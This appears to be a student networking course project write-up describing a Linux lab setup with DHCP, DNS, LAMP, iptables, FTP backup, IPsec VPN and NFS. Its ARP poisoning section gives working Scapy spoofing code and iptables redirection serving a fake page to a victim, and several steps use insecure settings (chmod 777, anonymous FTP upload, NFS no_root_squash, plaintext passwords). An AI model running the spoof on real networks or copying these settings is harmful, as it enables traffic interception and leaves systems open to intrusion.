Data Networking/Fall 2016/FYY

1. Fulin Shen 2. Yanxiao Lu 3. Yehui Rong

Motivation
The development of Linux is one of the most prominent examples of free and open-source software collaboration, and this is our motivation to use Linux operating system to design a robust, effective and dynamic network solution for a start-up company, including the main and backup DNS server, DHCP server, web server, firewall, IPsec VPN, NFS and backup.

Domain Name System
Domain Name System (DNS) controls the domain names of web server, translate them to Internet Protocol address. DNS is a protocol within the set of standards of how devices exchange data on the Internet. In this project, we design five records for the web server, including A, AAAA, NS, CNAME, and PTR types.

Dynamic Host Configuration Protocol
Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of numbers (i.e. a scope) configured for a given network. DHCP assigns an IP address when a system is started.

webserver
LAMP (Linux, Apache, MySQL, and PHP) is the most popular solution to get a web server up and running. In this project, we use LAMP to set up a simple webpage so that clients can browse it with the DNS and DHCP server’s help.

Firewall
The main function of a firewall is to provide security through couple rules applied to the server. Here we use the firewall to allow all the needed services and deny others to make our network secure and robust.

File Transfer Protocol
File transfer protocol offers the backup to the server to avoid the whole network crush if the main server is malfunction. FTP is built both on the client and server, use different control and data connections between the server and client. In the project, we design the policy to back up the whole web and SQL data every day, and clean the data every 30 days to save the space.

Arp Poison
Arp (address resolution protocol) determines the MAC address of a device with an IP address. And the Arp poison is a network attack which exploits the transition from layer 3 to layer 2 addresses. Arp poison means that the hacker replaces the MAC address in the normal ARP message with a counterfeit one, then the hacker can take the role of man in the middle to spoof any traffic. In the project, we use a client to work as a hacker to attack another client. Every time when the normal client tries to login the webserver page, the hacker will replace the web page and display a fake website to the client.

IPsec VPN
IPsec (Internet Protocol Security) is a protocol used to offer secure IP communications by authenticating and encrypting the messages between the peers. Here we design a IPsec VPN tunnel between two servers using the pre shared key.

Network File System
Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems, allowing the user or system administrator to mount (designate as accessible) all or a portion of a file system on a server. In this project, we create 2 clients to whom the shared file is available.

DHCP server
Step1: Install DHCP Command: sudo apt-get update sudo apt-get install dhcp3-server Step2: configure the network card Command: sudo nano /etc/default/isc-dhcp-server Find the line after ‘#’ and change the network card as ens33: # on what interfaces should the DHCP server (dhcpd) serve DHCP requests? #      Separate multiple interfaces with spaces, e.g. "eth0 eth1". INTERFACES="ens33" Save and Exit

Step3: edit the dhcpd.conf file Command: sudo nano /etc/dhcp/dhcpd.conf Set the domain name and the domain-name servers: # option definitions common to all supported networks...                option domain-name "pawupa.com"; option domain-name-servers ns.pawupa.com; Uncomment the following line: authoritative Give the ip address poll and define the subnet: # A slightly different configuration for an internal subnet. subnet 193.168.1.0 netmask 255.255.255.0 { range 193.168.1.20 192.168.1.100; option domain-name "pawupa.com"; option domain-name-servers ns1.pawupa.com; option domain-name-servers 193.168.1.102; option domain-name-servers ns2.pawupa.com; option domain-name-servers 193.168.1.103; option routers 193.168.1.1; option broadcast-address 193.168.1.255; default-lease-time 600; max-lease-time 7200; } Give fixed address to the web server, DNS server, DNS standby server and three clients: host web { hardware Ethernet 00:0c:29:65:f0:5e; fixed-address 193.168.1.1; }                host dns { hardware Ethernet 00:0c:29:43:e7:1a; fixed-address 193.168.1.102; option routers 193.168.1.1; option broadcast-address 193.168.1.255; default-lease-time 600; max-lease-time 7200; }                host dnsstandby { hardware Ethernet 00:0c:29:c5:44:bd; fixed-address 193.168.1.103; option routers 193.168.1.1; option broadcast-address 193.168.1.255; default-lease-time 600; max-lease-time 7200; }

And I give three clients 193.168.1.104, 193.168.1.105, 193.168.1.106 as the method above.

Step 4: give the static address to the DHCP server Command: sudo nano /etc/network/interfaces Configuration of interfaces: # interfaces(5) file used by ifup (8) and ifdown (8) auto lo                iface lo inet loopback auto ens33 iface ens33 inet static address 193.168.1.200 netmask 255.255.255.0 network 193.168.1.0 broadcast 193.168.1.255 gateway 193.168.1.1 iface ens33 inet6 static address 1199::1 netmask 64

DHCP IPv6 configuration Step 5: open the IPv6 configuration Command sudo nano /etc/sysctl.conf

Make the changes as shown below: net.ipv6.conf.all.forwarding=1

Run sysctl –p to make it effective.

Step 6: install radvd Command: sudo apt-get install radvd

Step7: configure the IPv6 address pool Command: sudo nano /etc/radvd.conf interface ens33 {                advSendAdvert on; prefix 1199::/64 {                };                 };

Step 8: give the DHCP server a fixed address Just as shown in step 4

Step 9: configure the DHCP server to access website through domain name Command: sudo nano /etc/resolv.conf nameserver 193.168.1.102 nameserver 193.168.1.103

step 10: restart and check the dhcp server after configuration Command: sudo networking restart sudo /etc/init.d/isc-dhcp-server restart sudo service isc-dhcp-server status

DNS
Master DNS

Step 1: Install bind9 Command: sudo apt-get install bind9 After install bind9, we will get configuration files named.conf, named.conf.options, and named.conf.local in

Step 2: Demand We want to make this host as master DNS, and can resolve www.pawupa.com 193.168.1.1(webserver) And add five records Thus, we need to add Forward Lookup Zones “pawupa.com” Backward Lookup Zones “1.168.193.in-addr.arpa” Another Backward Lookup Zones for IPV6 “0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa”

Step 3: Edit configuration file “named.conf.local” Add the forward and backward lookup zones Command: sudo vi named.conf.local zone "pawupa.com"{ type master; file "/etc/bind/pawupa.com"; };                zone "1.168.193.in-addr.arpa"{ type master; file "/etc/bind/rev.pawupa.com"; };                zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa"{ type master; file "/etc/bind/revip6.pawupa.com"; };

Step 4: Add files of zones Copy a zone “db.local” to pawupa.com Copy a zone “db.local” to rev.pawupa.com Copy a zone “db.local” to revip6.pawupa.com Command: sudo cp /etc/bind/db.local /etc/bind/pawupa.com sudo cp /etc/bind/db.local /etc/bind/rev.pawupa.com sudo cp /etc/bind/db.local /etc/bind/revip6.pawupa.com

Step 5: Edit files of zones Command: sudo vi pawupa.com ;                ; BIND data file for local loopback interface ;                $TTL    604800 @      IN      SOA     pawupa.com. root.pawupa.com. (                                              6         ; Serial                                          604800         ; Refresh                                           86400         ; Retry                                         2419200         ; Expire                                          604800 )       ; Negative Cache TTL ;                @       IN      NS      ns.pawupa.com. @      IN      A       193.168.1.102 @      IN      AAAA    1199::1111 ns     IN      A       193.168.1.102 ns     IN      AAAA    1199::1111 www    IN      A       193.168.1.1 www    IN      AAAA    1199::2222 oh     IN      CNAME   www diao   IN      CNAME   www wu     IN      CNAME   www pan    IN      CNAME   www sudo vi rev.pawupa.com ;                ; BIND reverse data file for local loopback interface ;                $TTL    604800 @      IN      SOA     pawupa.com. root.pawupa.com. (                                              6         ; Serial                                          604800         ; Refresh                                           86400         ; Retry                                         2419200         ; Expire                                          604800 )       ; Negative Cache TTL ;               @       IN      NS      ns.pawupa.com. 102    IN      PTR     ns.pawupa.com. 1      IN      PTR     www.pawupa.com. 1      IN      PTR     diao.pawupa.com. 1      IN      PTR     oh.pawupa.com. 1      IN      PTR     wu.pawupa.com. 1      IN      PTR     pan.pawupa.com. sudo vi revip6.pawupa.com ;                ; BIND reverse data file for local loopback interface ;                $TTL    604800 @      IN      SOA     pawupa.com. root.pawupa.com. (                                              6         ; Serial                                          604800         ; Refresh                                           86400         ; Retry                                         2419200         ; Expire                                          604800 )       ; Negative Cache TTL ;                @       IN      NS      ns.pawupa.com. 1.1.1.1.0.0.0.0.0.0.0.0.0.0.0.0 IN     PTR     ns.pawupa.com. 2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN     PTR     www.pawupa.com. 2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN     PTR     diao.pawupa.com. 2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN     PTR     oh.pawupa.com. 2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN     PTR     wu.pawupa.com. 2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN     PTR     pan.pawupa.com.

Step 6: Restart DNS service Command: sudo /etc/init.d/bind9 restart

Slave DNS

Step 1: Edit configuration file “named.conf.local” Add “allow-transfer { 193.168.1.103; }; “ to each zone, that synchronize the configuration of zones from master to slave. If master DNS cannot use, the slave DNS will help it to resolve. (193.168.1.103 is the IP address of slave DNS)

Command: sudo vi /etc/bind/named.conf.local zone "pawupa.com"{ type master; file "/etc/bind/pawupa.com"; allow-transfer { 193.168.1.103; }; };                zone "1.168.193.in-addr.arpa"{ type master; file "/etc/bind/rev.pawupa.com"; allow-transfer { 193.168.1.103; }; };                zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa "{ type master; file "/etc/bind/revip6.pawupa.com"; allow-transfer { 1199::5555; }; };

Step 2: Install bind9 to another host (slave DNS) Command: sudo apt-get install bind9

Step 3: Edit configuration file “named.conf.local” in slave DNS host Add the forward and backward lookup zones Command: sudo vi /etc/bind/named.conf.local zone "pawupa.com"{ type slave; file "/etc/bind/slaves/pawupa.com"; masters { 193.168.1.102; }; };                zone "1.168.193.in-addr.arpa"{ type slave; file "/etc/bind/slaves/rev.pawupa.com"; masters { 193.168.1.102; }; };                zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa"{ type slave; file "/etc/bind/slaves/revip6.pawupa.com"; masters { 1199::1111; }; };

Step 4: Change the authority of "/etc/bind” Command:               sudo /etc/apparmor.d/usr.sbin.named                change "/etc/bind/**r" to "/etc/bind/**rw"

Step 5: Restart apparmor Command: sudo /etc/init.d/apparmor restart

Step 6: Restart DNS service The configuration of zones files will be synchronized by master DNS Command: sudo /etc/init.d/bind9 restart

Web Server
Step 1: Install Apache Command: sudo apt-get update sudo apt-get install apache2 Step 2: Install PHP Command: sudo apt-get install php Step 3: Install MySQL, password “linux” Command: sudo apt-get install mysql-server Step 4: Check mysql is working Command: sudo netstat –tap | grep mysql Step 5: Install phpmyadmin using the apache2 and myql-server with password linux Command: sudo apt-get install phpmyadmin

Step 6: Change the authority of /var/www Command: sudo chmod 777 /var/www

Step 7: Create the phpmyadmin link Command: sudo ln –s /usr/share/phpmyadmin /var/www/html Step 8: Create a basic webpage “Index.htm” Step 9: Change the default webpage catalog “/var/www” to “/home/fulin” Command: sudo vi /etc/apache2/apache2.conf Step 10: Change the default webpage catalog “/var/www/html” to “/home/fulin” Command: Sudo vi /etc/apache2/sites-available/000-default.conf Step 11: Restart the apache Command: sudo /etc/init.d/apache2 restart Step 11: Use the browser on mac to connect the web page of the web server in VM

Firewall
Step 1: List the current rules that are configured for iptables Command: sudo iptables –L Step 2: Accept your current SSH connection Command: sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT Step 3: Accept SSH, HTTP, FTP, TFTP, DHCP, DNS, VPN Command: sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 20 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT sudo iptables -A OUTPUT -p tcp --dport 20 -j ACCEPT sudo iptables -A OUTPUT -p tcp --dport 21 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 53 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 546 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 547 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 1723 -j ACCEPT sudo iptables -A INPUT -p udp --dport 500 -j ACCEPT sudo iptables -A INPUT -p udp --dport 4500 -j ACCEPT sudo iptables -A INPUT -p udp --dport 69 -j ACCEPT sudo iptables -A OUTPUT -p udp --dport 69 -j ACCEPT sudo iptables -A INPUT -p udp --dport 1701 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT sudo iptables -A OUTPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT

Step 4: Accept services on the computer communicate with each other by sending network packets to each other Command: sudo iptables -I INPUT 1 -i lo -j ACCEPT

Step 5: Accept all traffic on loopback interface Command: sudo iptables -A INPUT -i lo -j ACCEPT sudo iptables -A OUTPUT -o lo -j ACCEPT

Step 6: Allow Established Outgoing Connections Command: sudo iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT

Step 7: Internal to External Command: sudo iptables -A FORWARD -i ens33 -o ens33 -j ACCEPT

Step 8: Drop Invalid Packets Command: sudo iptables -A INPUT -m conntrack --ctstate INVALID -j DROP

Step 9: Deny ping Command: Sudo iptables –A INPUT –p icmp --icmp-type echo-request –j REJECT

Step 10: Limit 10 connection for every client Command: sudo iptables -A INPUT -p tcp –-dport 22 –m connlimit –-connlimit-above 10 –j REJECT

Step 11: Prevent HTTP flood Command: sudo iptables -A INPUT -p tcp --dport 80 -m limit --limit 100/minute --limit-burst 200 -j ACCEPT

Step 12: Block an IP Address Command: sudo iptables -I INPUT -s 193.168.1.104 -j DROP

Step 13: Cancel the block IP address Command: sudo iptables -D INPUT -s 193.168.1.104 -j DROP

Step 14: Permit VPN Command: Sudo iptables –A INPUT –p udp --dport 500 –j ACCEPT Sudo iptables –A INPUT –p udp --dport 4500 –j ACCEPT Sudo iptables –A INPUT –p esp –j ACCEPT

Step 15: Deny any other Command: sudo iptables –A INPUT –j DROP

Step 16: In order to preserve your IPTABLES rules upon reboot, install iptables-persistant Command: sudo apt-get install iptables-persistent

Step 17: If you make any changes to the rules, run the following commands so you don’t lose them during a system reboot Command: sudo netfilter-persistent save sudo netfilter-persistent reload

Back UP
Step 1: Install ftp Command: Sudo apt-get install vsftpd

Step 2: Start ftp server Command: Service vsftpd start

Step 3: Create ftp script “testftp.sh” #!/bin/sh FTP_IP=193.168.1.104 FTP_USER=fulinshen FTP_PASS=sflin911911 FTP_backup=/home/fulinshen/test BK_DR=/home/fulin/varcopy DB_DR=/var DAYS=30 LINUX_USER=fulinshen date=` date +%Y%m%d ` tar zcvf $BK_DR/test$date.tar.gz $DB_DR chown -R $LINUX_USER:$LINUX_USER $BK_DR find $BK_DR -name "test*" -type f -mtime +$DAYS -exec rm {} \; deldate=` date -d -30day +%Y%m%d ` ftp -i -v -n $FTP_IP << END user $FTP_USER $FTP_PASS binary cd $FTP_backup lcd $BK_DR mput test$date.tar.gz                mdelete test$deldate.tar.gz                 bye

Step 4: Add authority to script Command: Chmod +x /home/fulin/varcopy/testftp.sh

Step 5: Change configuration of ftp sudo vi /etc/vsftpd.conf anonymous_enable=YES local_enable=YES anon_upload_enable=YES anon_mkdir_write_enable=YES

Step 6: Add kernel module to allow passive ftp modprobe ip_conntrack_ftp

Step 7: Restart ftp service and check the status Command: service vsftpd restart service vsftpd status

Step 8: Add rule to commit the script every day at 14:40 PM Command: Sudo vi /etc/crontab 40 14 * * * root sh /home/fulin/varcopy/testftp.sh >/dev/null 2>&1

Step 9: Restart cron service and check the status Command: service cron restart service cron status

Arp poison
Step 1: Install scapy Command: sudo apt-get install tcpdump python3-crypto ipython3 sudo apt install python-scapy sudo apt install sysv-rc-conf

Step 2: Use root Command: Sudo passwd root

Step 3: Start iptables after reboot Command: sysv-rc-conf --level 2345 iptables on

Step 4: Turn on IP forwarding Command: echo 1 > /proc/sys/net/ipv4/ip_forward

Step 5: Configure Scapy arp poison Command: scapy op=2 victim= '193.168.1.105' spoof= '193.168.1.1'        //gateway IP                 mac='00:0c:29:73:56:67' // victim mac address arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac) send(arp) op =1 arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac) send(arp) send(arp,inter=2,count=1000)     // send arp every 2 seconds, 1000 counts

Step 6: Create fake web page Command: /etc/init.d/apache2 start echo “WOW,YOU WON THE POWER BALL JACKPOT.” > /home/fulinshen/index.htm

Step 7: Then configure your IP Tables to forward all traffic except HTTP traffic. For HTTP traffic, we will return our own site instead (193.168.1.104 is the IP address of hacker) Command: iptables -t nat --flush iptables --zero iptables -A FORWARD --in-interface ens33 -j ACCEPT iptables -t nat --append POSTROUTING --out-interface ens33 -j MASQUERADE iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination 193.168.1.104

IPsec VPN
Step 1: Inatall strongswan Command: sudo apt-get install strongswan

Step 2: Install Opensc Command: Sudo apt-get install opensc

Step 3: Install GMP library Command: Sudo apt-get install libgmp10

Step 4: Install development library of GMP Command: Sudo apt-get install libgmp-dev

Step 5: Install Openssl libcrypto Command: Sudo apt-get install libssl-dev

Step 6: Under /usr/src/ folder, download the Strongswan Command: cd /usr/src wget https://download.strongswan.org/strongswan-5.5.0.tar.gz

Step 7: Extract the compressed file Command: tar –xzf strongswan-5.5.0.tar.gz

Step 8: Run the configure script to check the dependencies of strongswan Command: cd strongswan-5.5.0 ./configure –help | grep pkcs

Step 9: Run the configure script, use prefix /usr/local and enable openssl support Command: ./configure --prefix=/usr/local --enable-openssl

Step 10: Run the following two commands to compile and install strongswan under /usr/local directory Command: make make install

Step 11: Under /usr/local/etc path, Pre-share key based tunnel One side ipsec.conf configuration: config setup charondebug="all" uniqueids=yes strictcrlpolicy=no conn %default conn tunnel # left=193.168.1.1 leftsubnet=192.168.223.0/24 right=193.168.1.104 rightsubnet=192.168.222.0/24 ike=aes256-sha2_256-modp1024! esp=aes256-sha2_256! keyingtries=0 ikelifetime=1h lifetime=8h dpddelay=30 dpdtimeout=120 dpdaction=restart authby=secret auto=start keyexchange=ikev2 type=tunnel ipsec.secrets file configuration: 193.168.1.1 193.168.1.104 : PSK ‘linux’ Another side ipsec.conf configuration: config setup charondebug="all" uniqueids=yes strictcrlpolicy=no conn %default conn tunnel # left=193.168.1.104 leftsubnet=192.168.1.0/24 right=193.168.1.1 rightsubnet=192.168.2.0/24 ike=aes256-sha2_256-modp1024! esp=aes256-sha2_256! keyingtries=0 ikelifetime=1h lifetime=8h dpddelay=30 dpdtimeout=120 dpdaction=restart authby=secret auto=start keyexchange=ikev2 type=tunnel ipsec.secrets file configuration: 193.168.1.104 193.168.1.1 : PSK ‘linux’

Step12: After changes at both sides, create tunnel Command: Sudo ipesc restart

Step 13: Check the status of tunnel on both machines Command: Sudo ipsec statusall

Step 14: Test One server ping another: Ping –s 4048 193.168.1.104 At the another side, watch the status (If you notice the number of packets and the number of bytes should be increasing with the ping being run, this shows things are running the way they should be.): Sudo watch ipsec statusall

NFS
NFS-Server

Step 1: Inatall nfs-kernel-server Command: sudo apt-get install nfs-kernel-server sudo apt-get install rpcbind

Step 2: Make share folder Command: mkdir /home/reve001/Desktop/nfs

Step 3: Edit configuration Command: sudo vi /etc/exports /home/reve001/Desktop/nfs *(rw,sync,no_root_squash,no_subtree_check)

Step 4: Restart service Command: sudo service rpcbind restart restart sudo service restartnfs-kernel-server restart

Step 5: Test Command: showmount -e

Export list for ubuntu: /home/reve001/Desktop/nfs *

NFS-Clients 

Step 1: Inatall nfs-common for clients Command: sudo apt-get install nfs-common sudo apt-get install rpcbind

Step 2: Make share folder Command: mkdir /home/fulinshen/Desktop/nfs

Step 3: Mount the share file Command: sudo mount -t nfs 193.168.1.102:/home/reve001/Desktop/nfs /home/fulinshen/Desktop/nfs

Step 4: Mount this share file when turn on the client Command: sudo vi /etc/rc.local sudo mount -t nfs 193.168.1.102:/home/reve001/Desktop/nfs /home/fulinshen/Desktop/nfs

DHCP Test
Step 1: Start the DHCP server. Step 2: Start all the other clients, use “ifconfig” command to check whether or not the IP address is correctly received from the DHCP server.

Webserver Test
Step 1: Start the web server. Step 2: At the client side, open the browser and enter the IP address of the webserver to check whether or not the right web page can be displayed.

DNS Test
Step 1: Start the DNS server. Step 2: At the client side, open the browser again and this time enter the domain name of the webserver instead of the IP address, check whether or not the right web page can be displayed.

Firewall Test
Step 1: At a client side, open the browser to surf the web page. Step 2: Add an IPtable to deny the client browsing the web server. Step 3: At a client side, open the browser again, force refresh the web page, check whether or not the right web page can be displayed. Step 4: Delete the IPtable to allow the client browsing the web server again. Step 5: Again at the client side, open the browser again, force refresh the web page, check whether or not the right web page can be displayed. Step 6: When all the other IPtable rules existing, test the whole functions of the project to check whether or not these functions are working well or not.

Backup Test
Step 1: Start the FTP server. Step 2: Change the ftp configuration to enable the backup process in the next couple minutes, restart the ftp server. Step3: When the designed time arrives, check whether or not the files are backed up to the local file folder and the remote device’s file folder too.

Arp Poison Test
Step 1: Start the normal web server and the hacker’s web server. Step 2: The hacker to send fake ARP message to the client. Step 3: The client opens the browser to enter the normal web page, check whether or not the client will the fake web page instead of the normal page.

IPsec VPN Test
Step 1: One server ping another (Ping –s 4048 193.168.1.104). Step 2: At the another side, watch the status (If you notice the number of packets and the number of bytes should be increasing with the ping being run, this shows things are running the way they should be), using command “Sudo watch ipsec statusall”.

NFS Test
Step 1: Start NFS server and client. Step 2: Put a file to the shared folder on the client server. Step 3: At the server side, check whether or not the file exists.